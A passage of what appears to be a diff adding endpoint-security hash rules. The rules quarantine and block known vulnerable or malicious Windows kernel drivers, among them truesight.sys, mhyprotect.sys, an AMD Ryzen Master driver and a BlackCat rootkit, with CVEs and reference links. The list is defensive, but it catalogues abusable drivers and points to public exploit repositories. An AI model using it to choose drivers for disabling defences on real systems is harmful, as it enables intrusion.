"username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.808761Z", + "creation_date": "2026-03-23T11:45:31.808763Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.808769Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d2e8a4753abb0176692e89baf9607cc58b6d498a3fb2d4da095ab4a41a793702", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d715e8e2-2a88-52a0-a50a-06f9cb894618", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.813034Z", + "creation_date": "2026-03-23T11:45:31.813037Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.813045Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "839790b1272d3e7f8315b01b3dd41501cf6b12cab5688dc65c0dea98b5a116d0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d7220389-1b3a-507d-8ed7-06bc5c3f4ac4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.144782Z", + "creation_date": "2026-03-23T11:45:32.144784Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.144790Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5aded75d6beb315849f698a78f8033de26eb151955a1cbc01e3037320e2a0eb6", + "comment": "Malicious Kernel Driver (aka windivert.sys) [https://www.loldrivers.io/drivers/45a31a17-f78d-48ec-beba-74f6bfc5f96e/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d7455733-b796-59b0-9c5d-398e34a5a3a5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.821619Z", + "creation_date": "2026-03-23T11:45:31.821621Z", + "enabled": true, + 
"block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.821627Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0bcf09a59e2deb358e822f635df4a866721ea739a68e1225ea0aa029abfd6bdf", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d747e1e9-d3b4-5c37-946b-5b55047e41a0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.611728Z", + "creation_date": "2026-03-23T11:45:29.611730Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.611735Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "991228f3ea6c1ae8083aa405d1d066e48cd6dbd7d6bc01c81599b2c28f3923f1", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d7482fcb-4d34-51d3-a979-a42fdbaeaaa0", + "test_maturity_current_count": 
0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.980464Z", + "creation_date": "2026-03-23T11:45:29.980466Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.980472Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "982ad43111d8b7a7900df652c8873eeb6aa485bb429dee6c2ad44acf598bb5e6", + "comment": "Vulnerable Kernel Driver (aka rzpnk.sys) [https://www.loldrivers.io/drivers/1c6e1d3b-f825-4065-9e0c-83386883e40f/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d75ed853-499a-53bc-adb6-6a12ba145202", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.476852Z", + "creation_date": "2026-03-23T11:45:31.476856Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.476866Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": 
null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a32f9b83a80e09b28163c70af0d0ffff7acc7f7b63ddc3286c589bc741e41cf6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d766b573-7b05-5f68-a092-5ebf08e3ac88", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.486396Z", + "creation_date": "2026-03-23T11:45:31.486399Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.486406Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8210184d342da90354402e53fa09d6ba0173c3305c41072fd6a2ce79b0524a53", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d76b90ba-6963-5e2c-b282-8885f3b25b6f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + 
"source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.461724Z", + "creation_date": "2026-03-23T11:45:30.461728Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.461736Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "edeb35e4341034b2de389017c4884b081a821f34349a620897a2a845c84cb09e", + "comment": "Vulnerable Kernel Driver (aka mhyprotect.sys) [https://www.loldrivers.io/drivers/7abc873d-9c28-44c2-8f60-701a8e26af29/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d7766e4a-08d0-5e7c-8a14-30db3a3dadc8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.818754Z", + "creation_date": "2026-03-23T11:45:30.818756Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.818762Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8f69fa6128acbaa8217454ff22eb7fb9be1e841ed47116e7616749600b4bfc4d", + "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) 
[https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d780e75f-cab3-5af0-81c7-18889b59dee3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.815253Z", + "creation_date": "2026-03-23T11:45:31.815255Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.815261Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fad7be43548a35c9916a1765b6388710989f2d283cc60f8783a77651a97149cf", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d784f743-22d8-5d02-ad40-28cd9e5d36dc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.975166Z", + 
"creation_date": "2026-03-23T11:45:29.975168Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.975174Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f6cd7353cb6e86e98d387473ed6340f9b44241867508e209e944f548b9db1d5f", + "comment": "Vulnerable AMD Ryzen Master Driver (aka AMDRyzenMasterDriver.sys) [CVE-2020-12928, CVE-2023-20564] [https://www.loldrivers.io/drivers/13973a71-412f-4a18-a2a6-476d3853f8de/, https://github.com/tijme/amd-ryzen-master-driver-v17-exploit, https://github.com/zeze-zeze/HITCON-2023-Demo-CVE-2023-20562] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d79a7bdc-344c-5733-9af1-bb58feaf0277", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.810812Z", + "creation_date": "2026-03-23T11:45:31.810814Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.810820Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ceaa5af4b5d113dd319a7bc2d59c46853f39bc0ee0fe0b20e6a37c3afdfcd4a8", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d7a133c1-5746-560e-b10f-2b16f5af3787", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.816755Z", + "creation_date": "2026-03-23T11:45:31.816758Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.816767Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4c346263e92ab248bcd19a18014ff5dbedeb19b8299e0bcec0fa74946dbee6c0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d7a4bfeb-d73b-567b-939c-5c0db09fa268", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.827858Z", + "creation_date": 
"2026-03-23T11:45:31.827860Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.827865Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e2a5bc4aa25afc60dc545a9fa92bee958942741241503f943f2bf622e35db285", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d7b6d48c-3e12-55cb-b505-2cac0601ac73", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.829132Z", + "creation_date": "2026-03-23T11:45:30.829134Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.829140Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7884466b94141efa307b792801b9481a90d3034b568184836fd81cd5ffa341c6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ 
+ "id": "d7bd4c7d-d6dc-5075-a97f-eb788ae400e2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.140474Z", + "creation_date": "2026-03-23T11:45:31.140476Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.140482Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5e901746bce330cc13800168090d211718636e36d6ce8ab77519fb5d21bee06d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d7cc47ee-a857-5fd0-8413-bceba21e3d99", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.812205Z", + "creation_date": "2026-03-23T11:45:31.812207Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": 
"stable", + "hl_testing_start_time": "2026-03-23T11:45:31.812212Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6cdaefad0fedae063ce0cd212eaa2e2c7943156b997e36d1330e9901fb49176f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d7dc113b-0bd1-5702-a64a-d0a5704eafcb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.985448Z", + "creation_date": "2026-03-23T11:45:29.985450Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.985456Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "52d5c35325ce701516f8b04380c9fbdb78ec6bcc13b444f758fdb03d545b0677", + "comment": "Malicious BlackCat/ALPHV Ransomware Rootkit (aka dkrTK.sys) [https://www.trendmicro.com/en_us/research/23/e/blackcat-ransomware-deploys-new-signed-kernel-driver.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d7e3c98d-ef4c-50d7-8548-c9f8269afc62", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": 
"quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.825367Z", + "creation_date": "2026-03-23T11:45:30.825371Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.825378Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f22d6bfdd23fba86b06cd1081995b1c2766d819713a42a2bb15e14677e9f1314", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d7eca501-fe33-5a00-bede-90b0529723a5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.621444Z", + "creation_date": "2026-03-23T11:45:29.621446Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.621451Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b6fd51e1f57a03006953e84fd56cc2821cc19e7c77c0474e1110aabaacaf03df", + "comment": "ASUSTeK GPU vulnerable physmem driver (aka AsIO2_64.sys) [https://syscall.eu/blog/2020/03/30/asus_gio/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d804a6f7-c3c1-5ca1-b745-adb155157b8c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.618711Z", + "creation_date": "2026-03-23T11:45:29.618713Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.618719Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d4288c055c6d68b4a45df501877443e544b31c193f8559c8c7eac927ae738e8a", + "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d8134188-b101-53d9-a590-bde273178114", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.156214Z", + "creation_date": "2026-03-23T11:45:31.156216Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.156221Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9e4f46529a54b66e135162a6efe28db3148158427a6ce9e39cb9f769011073bd", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d820a63d-6d65-51c9-9605-98cd2dc2f661", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.145809Z", + "creation_date": "2026-03-23T11:45:32.145811Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.145816Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "82d928c586159342837cb457f45619f49db38bb91631a82e4f1b373fb994cd73", + "comment": 
"Malicious Kernel Driver (aka driver_82d928c5.sys) [https://www.loldrivers.io/drivers/af8ef3c0-8686-4112-992b-86587a4a9060/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d8265fae-9e46-5fda-adc5-24a8902cfba9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.982307Z", + "creation_date": "2026-03-23T11:45:29.982309Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.982315Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 